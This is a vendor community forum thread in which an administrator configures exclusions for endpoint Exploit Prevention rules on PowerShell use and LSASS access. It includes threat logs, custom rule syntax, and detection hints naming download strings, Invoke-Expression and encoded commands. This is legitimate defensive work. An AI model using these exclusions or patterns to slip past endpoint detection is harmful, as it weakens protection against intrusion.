cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Rhaya
Level 7
Report Inappropriate Content
Message 1 of 5

How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention

Jump to solution

Hello,

I need help.

We nearly got a MVISION Insights: UNC2447 Exploits SonicWall VPN Zero-Day(KB94756))situation.

Our company is probably on the attack list already (This information is from the Mandiant Researcher). Fortunately, there was no attacks on our company yet.

So we decide to block the rules of Exploit Prevention blow to prevent the risk.

Endpoint Security - Exploit Prevention:

Rule ID: 6135 Unmanaged Powershell Detected
Rule ID: 6086 Powershell Command Restriction - Command
Rule ID: 6073 Execution Policy Bypass in Powershell
Rule ID: 6085 Powershell Command Restriction - File
Rule ID: 6127 Suspicious LSASS Access from Powershell
 
We understand  this change  will cause lots of events. So I want to add some exclusions to this events.
If there is any other suggestions about the KB94756, I am very glad to here it.
Thanks for your help.
 
Example for Threat Event Log  No 1
 
Threat Source User Name:NT AUTHORITY\SYSTEM
Threat Source Process Name:Stxhd.HostAgents.HAService.exe
Threat Target Process Name:System.Management.Automation.ni.dll
Threat Target File Path:C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0af5dea397ab3b443f2a1df9e60e2302\System.Management.Automation.ni.dll
Event Category:'Process' class or access
Event ID:18060
Threat Severity:Critical
Threat Name:Unmanaged Powershell Detected
Threat Type:Exploit Prevention
Action Taken:Blocked
Threat Handled:TRUE
Analyzer Detection Method:Exploit Prevention
Event Description:Exploit Prevention Files/Process/Registry violation detected
Module Name:Threat Prevention
Analyzer Content Version:10.6.0.11855
Analyzer Rule ID:6135
Analyzer Rule Name:Unmanaged Powershell Detected
Source Process Hash:053f45366f9ff84db49c5e78a4ee7e9e
Source Process Signed:No
Source File Path:C:\Program Files\Amazon\StxHD\HostAgents\HostedApplicationService
Source File Size (Bytes):104448
Source Description:"C:\Program Files\Amazon\StxHD\HostAgents\HostedApplicationService\Stxhd.HostAgents.HAService.exe"
Target Hash:e1cc8fe9cdee7d837d67431063b4ef65
Target Signed:No
Target Name:System.Management.Automation.ni.dll
Target Path:C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0af5dea397ab3b443f2a1df9e60e2302
Target File Size (Bytes):34348544
Description:NT AUTHORITY\SYSTEM ran C:\Program Files\Amazon\StxHD\HostAgents\HostedApplicationService\Stxhd.HostAgents.HAService.exe, which tried to access the process System.Management.Automation.ni.dll, violating the rule "Unmanaged Powershell Detected", and was blocked. For information on how to respond to this event, see KB85494.
Duration Before Detection (Days):>7 days
Attack Vector Type:Local System
Access Requested:Create
Exclusion that I create
 
Exclusion type : File - Process - Registry
Name : System.Management.Automation.ni.dll
File name or  path : *\System.Management.Automation.ni.dll
 
 
 
Example for Threat Event Log  No 2
 
Threat Target Process Name:POWERSHELL.EXE
Threat Target File Path:C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Event Category:Host intrusion buffer overflow
Event ID:18054
Threat Severity:Critical
Threat Name:ExP:Illegal API Use
Threat Type:Exploit Prevention
Action Taken:Blocked
Threat Handled:TRUE
Analyzer Detection Method:Exploit Prevention
Event Description:An exploit was attempted and blocked
Module Name:Threat Prevention
Analyzer Content Version:10.6.0.11787
Analyzer Rule ID:6086
Analyzer Rule Name:Powershell Command Restriction - Command
Source Description:powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
Target Hash:04029e121a0cfa5991749937dd22a1d9
Target Signed:Yes
Target Signer:CN=MICROSOFT WINDOWS, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Target Parent Process Signed:Yes
Target Parent Process Signer:C=US, S=WASHINGTON, L=REDMOND, O=MICROSOFT CORPORATION, CN=MICROSOFT WINDOWS
Target Parent Process Name:COMPATTELRUNNER.EXE
Target Parent Process Hash:cb6ca75c8de515340514d54dd2eb0e64
Target Name:POWERSHELL.EXE
Target Path:C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0
Target File Size (Bytes):452608
API Name:AtlComPtrAssign
First Action Status:Not available
Second Action Status:Not available
Description:ExP:Illegal API Use Blocked an attempt to exploit C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE, which targeted the AtlComPtrAssign API.
Attack Vector Type:Local System
Exclusion that I create:
 
Exclusion type : Illegal API use - buffer overflow
Name : POWERSHELL.EXE
File name or  path : C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
API name : AtlComPtrAssign
 
1 Solution

Accepted Solutions

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention

Jump to solution

Unfortunately, there this isn't super easy to always manage in the UI, and sometimes it is impossible.  I would just rewrite the rules and add your exclusions as follows:

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
		Exclude OBJECT_NAME {
			-v "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
			-v "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe"
			-v "C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
			-v "C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell_ise.exe"
			-v "C:\\Program Files\\Amazon\\StxHD\\HostAgents\\HostedApplicationService\\Stxhd.HostAgents.HAService.exe"
		}
	}
	Target {
		Match SECTION {
			Include OBJECT_NAME {
				-v "System.Management.Automation.ni.dll"
				-v "System.Management.Automation.dll"
			}
			Include -access "CREATE"
		}
	}
}

 

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
	}
	Target {
		Match PROCESS {
			Include OBJECT_NAME { 
				-v "powershell.exe"
				-v "pwsh.exe"
			}
		Include PROCESS_CMD_LINE { -v "**-command**" }
		Exclude PROCESS_CMD_LINE { 
			-v "**-Command Write-Host 'Final result: 1';**"
		}
		Include -access "CREATE"
		}
	}
}

 

View solution in original post

4 Replies

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention

Jump to solution

Unfortunately, there this isn't super easy to always manage in the UI, and sometimes it is impossible.  I would just rewrite the rules and add your exclusions as follows:

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
		Exclude OBJECT_NAME {
			-v "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
			-v "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe"
			-v "C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
			-v "C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell_ise.exe"
			-v "C:\\Program Files\\Amazon\\StxHD\\HostAgents\\HostedApplicationService\\Stxhd.HostAgents.HAService.exe"
		}
	}
	Target {
		Match SECTION {
			Include OBJECT_NAME {
				-v "System.Management.Automation.ni.dll"
				-v "System.Management.Automation.dll"
			}
			Include -access "CREATE"
		}
	}
}

 

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
	}
	Target {
		Match PROCESS {
			Include OBJECT_NAME { 
				-v "powershell.exe"
				-v "pwsh.exe"
			}
		Include PROCESS_CMD_LINE { -v "**-command**" }
		Exclude PROCESS_CMD_LINE { 
			-v "**-Command Write-Host 'Final result: 1';**"
		}
		Include -access "CREATE"
		}
	}
}

 

View solution in original post

Rhaya
Level 7
Report Inappropriate Content
Message 3 of 5

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention

Jump to solution
@Daveb3d
Thanks for reply.
I am very appreciate it for the rules, and I will do some tests .
If there is any progress, I will post it as soon as I can.
Rhaya
Level 7
Report Inappropriate Content
Message 4 of 5

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention

Jump to solution

P.S

After searched threat events, we find out that there are a lot of different command options of the powershell.exe in our environments. It's almost impossible to create one rule to achieve the goal . So we didn't use the rule below. Instead, we make Original Rule 6086,6073,6085,6127 only to report.

 

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
	}
	Target {
		Match PROCESS {
			Include OBJECT_NAME { 
				-v "powershell.exe"
				-v "pwsh.exe"
			}
		Include PROCESS_CMD_LINE { -v "**-command**" }
		Exclude PROCESS_CMD_LINE { 
			-v "**-Command Write-Host 'Final result: 1';**"
		}
		Include -access "CREATE"
		}
	}
}

 

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention

Jump to solution

I tend to agree.  I might focus more on the following:

1) Download related strings (e.g. *download*, *IWR*, etc)

2) Invoke-expression

3) Encoded commands.  

Dave

PS.  Thanks for the accepted solution.  Upgraded me to MVP on here. 😄

You Deserve an Award
Don't forget, when your helpful posts earn a kudos or get accepted as a solution you can unlock perks and badges. Those aren't the only badges, either. How many can you collect? Click here to learn more.

Community Help Hub

    New to the forums or need help finding your way around the forums? There's a whole hub of community resources to help you.

  • Find Forum FAQs
  • Learn How to Earn Badges
  • Ask for Help
Go to Community Help

Join the Community

    Thousands of customers use the McAfee Community for peer-to-peer and expert product support. Enjoy these benefits with a free membership:

  • Get helpful solutions from McAfee experts.
  • Stay connected to product conversations that matter to you.
  • Participate in product groups led by McAfee employees.
Join the Community
Join the Community